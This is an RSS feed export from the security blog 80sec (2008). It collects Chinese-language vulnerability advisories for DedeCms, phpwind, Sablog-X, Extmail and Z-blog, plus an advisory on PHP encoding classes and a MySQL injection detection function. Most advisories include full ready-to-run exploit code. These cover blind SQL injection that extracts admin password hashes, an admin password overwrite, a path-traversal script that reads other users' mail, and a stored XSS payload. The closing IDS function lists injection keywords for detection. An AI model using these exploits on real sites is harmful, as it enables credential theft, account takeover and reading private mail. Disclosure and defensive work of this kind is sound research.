80sec http://www.80sec.com Know it then hack it! Tue, 12 Aug 2008 05:40:34 +0000 http://wordpress.org/?v=2.5.1 en dedecms注射漏洞 http://www.80sec.com/dedecms-sql-injection.html http://www.80sec.com/dedecms-sql-injection.html#comments Tue, 12 Aug 2008 05:39:56 +0000 admin http://www.80sec.com/?p=32 Close(); exit(); …… function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){ global $cfg_phpurl,$cfg_ml; $jobs = array(); $start = ($pageno-1) * $pagesize; $dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize "); $dsql->Execute();//orderby 带入数据库查询 …… ---------------------------------------------------------- 漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档): <? print_r(' -------------------------------------------------------------------------------- DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit BY Flyh4t www.wolvez.org Thx for all the members of W.S.T and my friend Oldjun -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].’ [...]]]> 漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

漏洞厂商:http://www.dedecms.com

漏洞来源:http://www.80sec.com/release/dedecms-sql-injection.txt

漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下


-------------------------------------------------------
if(empty($orderby)) $orderby = 'pubdate';

//重载列表
if($dopost=='getlist'){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数
$dsql->Close();
exit();
……
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;

$dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
$dsql->Execute();//orderby 带入数据库查询
……
----------------------------------------------------------

漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档):


<?
print_r('
--------------------------------------------------------------------------------
DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
BY Flyh4t
www.wolvez.org
Thx for all the members of W.S.T and my friend Oldjun
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].’ host path
host: target server (ip/hostname)
path: path to DEDEcms
Example:
php ‘.$argv[0].’ localhost /
——————————————————————————–
‘);
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80′);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix=”dede_”;
$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;

if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))
{echo ‘Error… check the path!’; die;}

/*get $prefix*/
$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (eregi(”in your SQL syntax”,$html))
{
$temp=explode(”From “,$html);
$temp2=explode(”member”,$temp[1]);
if($temp2[0])
$prefix=$temp2[0];
echo “[+]prefix -> “.$prefix.”\n”;
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo “[~]exploting now,plz waiting\r\n”;

/*get password*/
$j=1;$password=”";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”\r\n”;break;}
}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

/*get userid*/
$j=1;$admin=”";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”\r\n”;break;}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

print_r(’
——————————————————————————–
[+]userid -> ‘.$admin.’
[+]pwd(md5 24位) -> ‘.$password.’
——————————————————————————–
‘);
function is_hash($hash)
{
if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo “Exploit succeeded…”;}
else {echo “Exploit failed…”;}
?>

]]> http://www.80sec.com/dedecms-sql-injection.html/feed phpwind任意修改管理员密码漏洞 http://www.80sec.com/phpwind-admin-pass-change-vul.html http://www.80sec.com/phpwind-admin-pass-change-vul.html#comments Tue, 05 Aug 2008 14:25:21 +0000 admin http://www.80sec.com/?p=31 600 || $e_login[2]>1 ){ $men_uid=$men['uid']; $men_pwd=$men['password']; $check_pwd=$password; if($men['yz'] > 2){ wap_msg(’c'); } if(strlen($men_pwd)==16){ $check_pwd=substr($password,8,16);/*支持 16 位 md5截取密码*/ } if($men_pwd==$check_pwd){ if(strlen($men_pwd)==16){ $db->update(”UPDATE pw_members SET password=’$password’ WHERE uid=’$men_uid’”); } $L_groupid=(int)$men['groupid']; Cookie(”ck_info”,$db_ckpath.”\t”.$db_ckdomain); }else{ global $L_T; $L_T=$e_login[2]; $L_T ? $L_T–:$L_T=5; $F_login=”$onlineip *|$timestamp|$L_T”; $db->update(”UPDATE pw_memberdata SET onlineip=’$F_login’ WHERE uid=’$men_uid’”); wap_msg(’login_pwd_error’); } }else{ global $L_T; $L_T=600-($timestamp-$e_login[1]); wap_msg(’login_forbid’); } } else { global $errorname; $errorname=$username; wap_msg(’user_not_exists’); } Cookie(”winduser”,StrCode($men_uid.”\t”.PwdCode($password))); Cookie(’lastvisit’,”,0); wap_msg(’wap_login’,'index.php’); } 甚至不用注册账户,只要精心构造username即可利用此漏洞。 漏洞利用:80sec提供exploit如下: import urllib2,httplib,sys httplib.HTTPConnection.debuglevel = 1 cookies = urllib2.HTTPCookieProcessor() opener = [...]]]> 漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限。

漏洞厂商:http://www.phpwind.net

漏洞来源:http://www.80sec.com/release/phpwind-admin-pass-change-vul.txt

漏洞解析:在phpwind的wap模块中的字符转码程序存在问题,细节在http://www.80sec.com/php-coder-class-security-alert.html,但是80sec发现,在phpwind的wap模块中,该编码转换类存在更为严重的问题,甚至没有任何的条件,即使安装了iconv等编码模块一样受到该漏洞的影响,几乎没有条件限制。在phpwind中,wap是默认关闭的,但是我们发现在phpwind<=5.3版本中,变量存在全局没有初始化的问题,导致远程用户可以开启该模块,从而导致一个注射安全漏洞产生。
在phpwind中的注射漏洞中,phpwind过分相信从数据库中取出的变量,从而可能可以更改一些数据处理流程,导致任意修改其他用户的密码,包括管理员,问题代码在wap_mod.php中如下:


function wap_login($username,$password){
global $db,$timestamp,$onlineip,$db_ckpath,$db_ckdomain,$db_bbsurl;

$men=$db->get_one("SELECT m.uid,m.password,m.groupid,m.yz,md.onlineip FROM pw_members m LEFT JOIN pw_memberdata md ON md.uid=m.uid WHERE username='$username'");
if($men){
$e_login=explode("|",$men['onlineip']);
if($e_login[0]!=$onlineip.’ *’ || ($timestamp-$e_login[1])>600 || $e_login[2]>1 ){
$men_uid=$men['uid'];
$men_pwd=$men['password'];
$check_pwd=$password;
if($men['yz'] > 2){
wap_msg(’c');
}
if(strlen($men_pwd)==16){
$check_pwd=substr($password,8,16);/*支持 16 位 md5截取密码*/
}
if($men_pwd==$check_pwd){
if(strlen($men_pwd)==16){
$db->update(”UPDATE pw_members SET password=’$password’ WHERE uid=’$men_uid’”);
}
$L_groupid=(int)$men['groupid'];
Cookie(”ck_info”,$db_ckpath.”\t”.$db_ckdomain);
}else{
global $L_T;
$L_T=$e_login[2];
$L_T ? $L_T–:$L_T=5;
$F_login=”$onlineip *|$timestamp|$L_T”;
$db->update(”UPDATE pw_memberdata SET onlineip=’$F_login’ WHERE uid=’$men_uid’”);
wap_msg(’login_pwd_error’);
}
}else{
global $L_T;
$L_T=600-($timestamp-$e_login[1]);
wap_msg(’login_forbid’);
}
} else {
global $errorname;
$errorname=$username;
wap_msg(’user_not_exists’);
}
Cookie(”winduser”,StrCode($men_uid.”\t”.PwdCode($password)));
Cookie(’lastvisit’,”,0);
wap_msg(’wap_login’,'index.php’);
}

甚至不用注册账户,只要精心构造username即可利用此漏洞。

漏洞利用:80sec提供exploit如下:


import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)
argvs=sys.argv

data = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*&pwpwd=123456″
pwurl = “%s” % argvs[1]
pwurl = pwurl + “wap/index.php”

print “\r\n\r\nPhpwind Admin Pass Change Exploit”
print “Phpwind <=5.3 "
print "By 80sec "
print "python.exe "+argvs[0]+" http://www.80sec.com/pwforum/ 1\r\n"

print "\r\n[+]TargetForum: "+argvs[1]
print "[+]TargetId: "+argvs[2]

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
data = data)
f=opener.open(request)
headers=f.headers.dict
try :
cookie=headers["set-cookie"]
if cookie.index('winduser') :
print "[+]Exploit Success"
else : print "[-]Exploit Failed"

except:
print "[-]Exploit Failed"

漏洞修复:请及时打上官方最新补丁 http://www.phpwind.net/read-htm-tid-643202.html

]]> http://www.80sec.com/phpwind-admin-pass-change-vul.html/feed 安全天使sablog注射漏洞 http://www.80sec.com/sablog-sql-injectio.html http://www.80sec.com/sablog-sql-injectio.html#comments Tue, 05 Aug 2008 11:27:46 +0000 admin http://www.80sec.com/?p=30 漏洞说明:Sablog-X是一个采用PHP和MySQL构建的博客系统.作为Sablog的后继产品,Sablog-X在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在原有的基础上,更上一层楼.凭借Sablog-X作者7年多的安全技术经验,4年的PHP开发经验,强于创新,追求完美的设计理念,使得Sablog-X已获得业内越来越多专家和用户的认可.但是80sec在其中的代码里发现一个安全漏洞,导致远程用户通过SQL注射获得数据库权限,甚至获得管理员权限。

漏洞厂商:http://www.sablog.net

漏洞来源:http://www.80sec.com/release/sablog-sql-injection.txt

漏洞解析:在sablog的trackback.php中的转码函数


function iconv2utf($chs) {
global $encode;
if ($encode != 'utf-8') {
if (function_exists('mb_convert_encoding')) {
$chs = mb_convert_encoding($chs, 'UTF-8', $encode);
} elseif (function_exists('iconv')) {
$chs = iconv($encode, 'UTF-8', $chs);
}
}
return $chs;
}

存在问题,当$encode为GBK字符集的时候,用户提交%bf’将会被转化为一个正常的utf-8字符和一个单引号,如果数据未加处理进入数据库将导致SQL注射。

漏洞利用:80sec提供漏洞测试程序如下:


#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Sablog-X <= 1.6 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by SaBlog-X"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].’ host path code
host: target server (ip/hostname)
path: path to sablog-x
code: the last blog trackback gbk code
Example:
php ‘.$argv[0].’ localhost /sablog-x/ MQlnYmsJMTIxNzkyMzE0OAkw
+—————————————————————————+
‘);
exit;
}

error_reporting(7);
ini_set(’max_execution_time’, 0);

$host = $argv[1];
$path = $argv[2];
$code = $argv[3];

$arr = explode(”\t”, base64_decode($code));
if (count($arr) != 4)
exit(”Exploit Failed!\n”);

$url = ‘http://’.$host.$path.’?action=show&id=’.$arr[0];

send();
preg_match(’#<a\shref=”1″\starget=”_blank”>([\S]+):([a-z0-9]{32})</a<#’, file_get_contents($url), $hash);

if ($hash)
exit(”Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n”);
else
exit(”Exploit Failed!\n”);

function send()
{
global $host, $path, $code;

$cmd = ‘url=http://’.$host.$path.’&title=ryat%bf%27,’.time().’,1,1,(SELECT CONCAT(username,0×3a,password) FROM sablog_users WHERE userid=1),’.time().’,1,1)#&excerpt=ryat&blog_name=ryat’;

$message = “POST “.$path.”trackback.php?code=$code HTTP/1.1\r\n”;
$message .= “Accept: */*\r\n”;
$message .= “Accept-Language: zh-cn\r\n”;
$message .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;
$message .= “Host: $host\r\n”;
$message .= “Content-Length: “.strlen($cmd).”\r\n”;
$message .= “Connection: Close\r\n\r\n”;
$message .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = ”;

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

漏洞状态:请等待官方补丁。

]]> http://www.80sec.com/sablog-sql-injectio.html/feed php第三方编码转换类安全警告 http://www.80sec.com/php-coder-class-security-alert.html http://www.80sec.com/php-coder-class-security-alert.html#comments Tue, 05 Aug 2008 06:15:22 +0000 admin http://www.80sec.com/?p=29 漏洞说明:在外面广泛使用的众多php编码转换类中,已经被证明在某些情况下会存在安全问题,构造畸形的数据将导致转换类的结果不可靠,从而可能使数据绕过系统的安全认证,一些开源程序如Discuz,Phpwind已经被批漏存在问题,Discuz和Phpwind均已发布补丁。

漏洞厂商:众多第三方编码转换类

漏洞解析:

编码转换类在系统存在iconv等函数的时候会选择iconv函数,但是如果系统不存在iconv或者不支持多字节编码转换的情况下,编码转换类会自己实现对编码的转换。在这里由于系统iconv在进行utf8编码转换时会严格遵守约定,对于不合法的数据将进行抛弃处理,而某些第三方编码类则会进行强行的转换,如一个非法的utf8字节如0xc15c27将被转换为0×808027或其他类似处理,这将导致其绕过程序的addslashes等安全保护,譬如恶意用户提交0xc127,经过php安全处理后将变成0xc15c27,然后经过转码后将成为0×808027,导致安全防护失败,导致安全漏洞。

漏洞证明及修复:

Phpwind官方补丁:http://www.phpwind.net/read-htm-tid-643202.html
Discuz!官方补丁:http://www.discuz.net/thread-1008182-1-1.html

80sec提醒使用编码转换类的厂商和程序及时检查自己的安全设置,可以通过对进行转码后的数据再次安全处理来修复这个问题,如果有iconv的支持则尽量使用iconv模块而不要自己实现编码。

]]> http://www.80sec.com/php-coder-class-security-alert.html/feed Extmail安全漏洞 http://www.80sec.com/extmail-security-hole.html http://www.80sec.com/extmail-security-hole.html#comments Tue, 29 Jul 2008 01:59:27 +0000 admin http://www.80sec.com/?p=28 new; $mysid="d9a4c4f05aca535d696f8983a23e42bd"; $mytarget="http://www.80sec.com/"; $user='80sec'; $ARGV[0]&&($user=$ARGV[0]); open(RESULT,”>>$user.txt”); for($i=0;;$i++) { my @headers=(’Cookie’=>”sid=$mysid”,’User-Agent’=>’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’,); $myresponse=$browser->post(”${mytarget}compose.cgi”,['__mode'=>'edit_forward','folder'=>"Sent/../../../${user}/Maildir",'pos'=>"$i"],@headers); $myecho=$myresponse->content; $_=$myecho; if(m/Some errors occured/i) { print “Error!”; print $_; unlink “$user.txt”; exit; } $bak=$_; s/(.*?)value=\”Fwd:(.+?)\” onKeyDown=(.*?)$/$2/sg; $subject=$_; $_=$bak; s/(.*?)<textarea name=”message”(.+?)>(.+?)<\/textarea>(.*)/$3/sg; s/<br>/\n/sg; s/"/\”/sg; s/</</g; s/>/>/sg; s/ / /sg; s/\r/\n/sg; s/\n+/\n/sg; s/<.*?>//sg; s/——– Forwarded Messages ——–//sg; $last=$_; s/\s//sg; s/From://sg; s/To://sg; $msg=$_; # $subject=chomp($subject); # $msg=chomp($msg); if(!$subject&&!$msg) { print “Done!估计没了!\r\n”; print $last; exit; } print “$user第$i封邮件:\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n标题:”.$subject.”\r\n内容:”.$msg.”++++++++++++++++++++++++++++++++++++++++++++\r\n”; print RESULT “$user第$i封邮件:\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n标题:”.$subject.”\r\n内容:”.$msg.”++++++++++++++++++++++++++++++++++++++++++++\r\n”; } ]]> 漏洞说明:ExtMail Project 是一个活跃的开源邮件系统项目,目前由ExtMail 团队维护。该项于2005年9月18日正式启动,最初以WebMail软件为主,至今已逐步形成了ExtMail软件系列。整个项目的目标是开发出高效、易用、富有生命力的邮件系统(方案),经过粗略的统计,截止2007年6月份,已有超过3000个服务器在运行ExtMail软件,其中有超过1000个运行在互联网上。Webmail采取perl语言CGI方式编写,国内众多知名站点均使用extmail,譬如http://mail.csdn.net。80sec在其产品中发现安全漏洞,包括SQL注射,任意用户身份劫持,以及任意信件读取的几个重大安全漏洞。

漏洞厂商:http://www.extmail.org/

漏洞解析:

1 SQL注射漏洞

程序在处理用户登陆参数的地方没有对SQL注射进行防护,导致可能产生SQL注射漏洞,该处没有回显,但是利用延迟技术,一样可以进行敏感信息获取

2 任意用户身份获取漏洞

程序在处理全局用户参数提交时产生错误,导致匿名用户可以在该会话期间内上传文件到/tmp/目录,而程序的所有认证机制都是依靠/tmp/下的文件来处理的,所以匿名用户可以伪造认证文件来窃取其他的用户身份

3 任意信件读取漏洞

程序依靠文件处理系统来区分各个用户和信件,但是程序在处理个别参数的时候存在安全漏洞,导致用户可以跳出目录进入其他人的目录读取敏感信息如信件。

漏洞状态:80sec已经通知官方,但是到目前没有获得任何回复

漏洞证明:80sec发放任意信件读取漏洞的POC


#!/usr/bin/perl
#Exp for Ext-mail
#Codz By 80sec http://www.80sec.com

use LWP;
my $browser = LWP::UserAgent->new;

$mysid="d9a4c4f05aca535d696f8983a23e42bd";
$mytarget="http://www.80sec.com/";
$user='80sec';

$ARGV[0]&&($user=$ARGV[0]);
open(RESULT,”>>$user.txt”);

for($i=0;;$i++) {
my @headers=(’Cookie’=>”sid=$mysid”,’User-Agent’=>’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’,);
$myresponse=$browser->post(”${mytarget}compose.cgi”,['__mode'=>'edit_forward','folder'=>"Sent/../../../${user}/Maildir",'pos'=>"$i"],@headers);
$myecho=$myresponse->content;
$_=$myecho;
if(m/Some errors occured/i) {
print “Error!”;
print $_;
unlink “$user.txt”;
exit;
}

$bak=$_;

s/(.*?)value=\”Fwd:(.+?)\” onKeyDown=(.*?)$/$2/sg;
$subject=$_;

$_=$bak;
s/(.*?)<textarea name=”message”(.+?)>(.+?)<\/textarea>(.*)/$3/sg;
s/<br>/\n/sg;
s/"/\”/sg;
s/</</g;
s/>/>/sg;
s/ / /sg;
s/\r/\n/sg;
s/\n+/\n/sg;
s/<.*?>//sg;
s/——– Forwarded Messages ——–//sg;
$last=$_;

s/\s//sg;
s/From://sg;
s/To://sg;
$msg=$_;

# $subject=chomp($subject);
# $msg=chomp($msg);
if(!$subject&&!$msg) {
print “Done!估计没了!\r\n”;
print $last;
exit;
}
print “$user第$i封邮件:\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n标题:”.$subject.”\r\n内容:”.$msg.”++++++++++++++++++++++++++++++++++++++++++++\r\n”;
print RESULT “$user第$i封邮件:\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n标题:”.$subject.”\r\n内容:”.$msg.”++++++++++++++++++++++++++++++++++++++++++++\r\n”;

}

]]> http://www.80sec.com/extmail-security-hole.html/feed Z-blog又一严重跨站脚本攻击漏洞 http://www.80sec.com/zblog-xss.html http://www.80sec.com/zblog-xss.html#comments Mon, 21 Jul 2008 10:16:11 +0000 admin http://www.80sec.com/?p=27 0 Then objRegExp.Pattern=”(\[URL\])(([a-zA-Z0-9]+?):\/\/\S+?)(\[\/URL\])” strContent= objRegExp.Replace(strContent,”$2“) objRegExp.Pattern=”(\[URL\])(.+?)(\[\/URL\])” strContent= objRegExp.Replace(strContent,”$2“) objRegExp.Pattern=”(\[URL=)(([a-zA-Z0-9]+?):\/\/\S+?)(\])(.+?)(\[\/URL\])” strContent= objRegExp.Replace(strContent,”$5“) objRegExp.Pattern=”(\[URL=)(\S+?)(\])(\S+?)(\[\/URL\])” strContent= objRegExp.Replace(strContent,”$4“) objRegExp.Pattern=”(\[EMAIL\])(\S+\@\S+?)(\[\/EMAIL\])” strContent= objRegExp.Replace(strContent,”$2“) objRegExp.Pattern=”(\[EMAIL=)(\S+\@\S+?)(\])(.+?)(\[\/EMAIL\])” strContent= objRegExp.Replace(strContent,”$4“) End If 可以看到其中的正则表达式过滤并不严格,这种循环匹配也很容易出现逻辑问题,精心构造代码即可触发跨站脚本漏洞,可以发表评论如下 [URL][URL]http://=''style='c:expression(alert())'[/URL][/URL] 上面代码将循环执行alert(),当然,你也可以引入自己的恶意js执行:) 漏洞状态:该漏洞非常危险,完全不需要任何交互行为即可完成攻击,已经通知官方,请等候官方反应. ]]> 漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是在上次的xss漏洞被公布后,80sec在产品中又发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。

漏洞厂商:http://www.rainbowsoft.org/

漏洞解析:在FUNCTION/c_function.asp中,程序处理UBB标签的时候存在漏洞,导致任何用户可以在目标页面内执行任意js代码,利用该代码恶意用户可以获取目标站点的所有权限。漏洞代码如下:


Function UBBCode(ByVal strContent,strType)

Dim objRegExp
Set objRegExp=new RegExp
objRegExp.IgnoreCase =True
objRegExp.Global=True

If ZC_UBB_LINK_ENABLE And Instr(strType,"[link]“)>0 Then

objRegExp.Pattern=”(\[URL\])(([a-zA-Z0-9]+?):\/\/\S+?)(\[\/URL\])”
strContent= objRegExp.Replace(strContent,”$2“)

objRegExp.Pattern=”(\[URL\])(.+?)(\[\/URL\])”
strContent= objRegExp.Replace(strContent,”$2“)

objRegExp.Pattern=”(\[URL=)(([a-zA-Z0-9]+?):\/\/\S+?)(\])(.+?)(\[\/URL\])”
strContent= objRegExp.Replace(strContent,”$5“)

objRegExp.Pattern=”(\[URL=)(\S+?)(\])(\S+?)(\[\/URL\])”
strContent= objRegExp.Replace(strContent,”$4“)

objRegExp.Pattern=”(\[EMAIL\])(\S+\@\S+?)(\[\/EMAIL\])”
strContent= objRegExp.Replace(strContent,”$2“)

objRegExp.Pattern=”(\[EMAIL=)(\S+\@\S+?)(\])(.+?)(\[\/EMAIL\])”
strContent= objRegExp.Replace(strContent,”$4“)

End If

可以看到其中的正则表达式过滤并不严格,这种循环匹配也很容易出现逻辑问题,精心构造代码即可触发跨站脚本漏洞,可以发表评论如下

[URL][URL]http://=''style='c:expression(alert())'[/URL][/URL]

上面代码将循环执行alert(),当然,你也可以引入自己的恶意js执行:)

漏洞状态:该漏洞非常危险,完全不需要任何交互行为即可完成攻击,已经通知官方,请等候官方反应.

]]> http://www.80sec.com/zblog-xss.html/feed MYSQL Injection IDS [ver.1.0][Updated] http://www.80sec.com/mysql-injection-ids-ver10.html http://www.80sec.com/mysql-injection-ids-ver10.html#comments Mon, 14 Jul 2008 02:12:55 +0000 admin http://www.80sec.com/?p=26 $pos1) { $pos = [...]]]> /*

MYSQL Injection IDS [ver.1.0]

BY 80sec http://www.80sec.com/

函数严格限制SQL文里出现

###########################################
union查询
select子查询
不常用的注释
文件操作
benchmark等危险函数
###########################################

原始地址: http://www.80sec.com/release/Mysql-injection-ids-1.0.txt

本函数适合一些开放代码的程序(因为这些程序需要考虑到在各种版本的Mysql里运行),但是可能并不适合在你的程序里,你可以通过修改自己的程序或者做合适的配置来适应它另外对于正常的SQL语句,由于本程序使用的是操作相对来说比较快的strpos来实现的,所以效率影响不是很大:)

关于使用:
1 本函数是在MYSQL操作层来检测非法的SQL查询,大部分情况下该查询是由入侵者引起的,您可能也需要调整自己的程序,本程序不能作为过滤函数
2 本函数需要部署在mysql_query函数前面,作为检测即将执行的SQL语句,最好将他部署在你的MYSQL操作类的前面
3 非法操作默认记录在根目录下,名字为站点根目录的md5值

任何建议与部署上的问题欢迎与

root#80sec.com

联系

:)

*/


function check_sql($db_string){

$clean = '';
$error='';
$old_pos = 0;
$pos = -1;
$log_file=$_SERVER['DOCUMENT_ROOT'].md5($_SERVER['DOCUMENT_ROOT']).”.php”;

while (true)
{
$pos = strpos($db_string, ‘\”, $pos + 1);
if ($pos === false)
break;
$clean .= substr($db_string, $old_pos, $pos - $old_pos);

while (true)
{
$pos1 = strpos($db_string, ‘\”, $pos + 1);
$pos2 = strpos($db_string, ‘\\’, $pos + 1);
if ($pos1 === false)
break;
elseif ($pos2 == false || $pos2 > $pos1)
{
$pos = $pos1;
break;
}

$pos = $pos2 + 1;
}
$clean .= ‘$s$’;

$old_pos = $pos + 1;
}

$clean .= substr($db_string, $old_pos);

$clean = trim(strtolower(preg_replace(array(’~\s+~s’ ), array(’ ‘), $clean)));

//老版本的Mysql并不支持union,常用的程序里也不使用union,但是一些黑客使用它,所以检查它
if (strpos($clean, ‘union’) !== false && preg_match(’~(^|[^a-z])union($|[^[a-z])~s’, $clean) != 0){
$fail = true;
$error=”union detect”;
}
//发布版本的程序可能比较少包括–,#这样的注释,但是黑客经常使用它们
elseif (strpos($clean, ‘/*’) > 2 || strpos($clean, ‘–’) !== false || strpos($clean, ‘#’) !== false){
$fail = true;
$error=”comment detect”;
}
//这些函数不会被使用,但是黑客会用它来操作文件,down掉数据库
elseif (strpos($clean, ’sleep’) !== false && preg_match(’~(^|[^a-z])sleep($|[^[a-z])~s’, $clean) != 0){
$fail = true;
$error=”slown down detect”;
}
elseif (strpos($clean, ‘benchmark’) !== false && preg_match(’~(^|[^a-z])benchmark($|[^[a-z])~s’, $clean) != 0){
$fail = true;
$error=”slown down detect”;
}
elseif (strpos($clean, ‘load_file’) !== false && preg_match(’~(^|[^a-z])load_file($|[^[a-z])~s’, $clean) != 0){
$fail = true;
$error=”file fun detect”;
}
elseif (strpos($clean, ‘into outfile’) !== false && preg_match(’~(^|[^a-z])into\s+outfile($|[^[a-z])~s’, $clean) != 0){
$fail = true;
$error=”file fun detect”;
}
//老版本的MYSQL不支持子查询,我们的程序里可能也用得少,但是黑客可以使用它来查询数据库敏感信息
elseif (preg_match(’~\([^)]*?select~s’, $clean) != 0){
$fail = true;
$error=”sub select detect”;
}

if (!empty($fail))
{

fputs(fopen($log_file,’a+’),”<?php die();?>||$db_string||$error\r\n”);
die(”Hacking Detect<br><a href=http://www.80sec.com/>http://www.80sec.com“);
}

else {
return $db_string;
}
}

/*
$sql=”select * from news where id=’”.$_GET[id].”‘”; //程序功能的SQL语句,有用户数据进入,可能存在SQL注射

check_sql($sql); //用我们的函数检查SQL语句

mysql_query($sql); //安全的数据库执行
*/

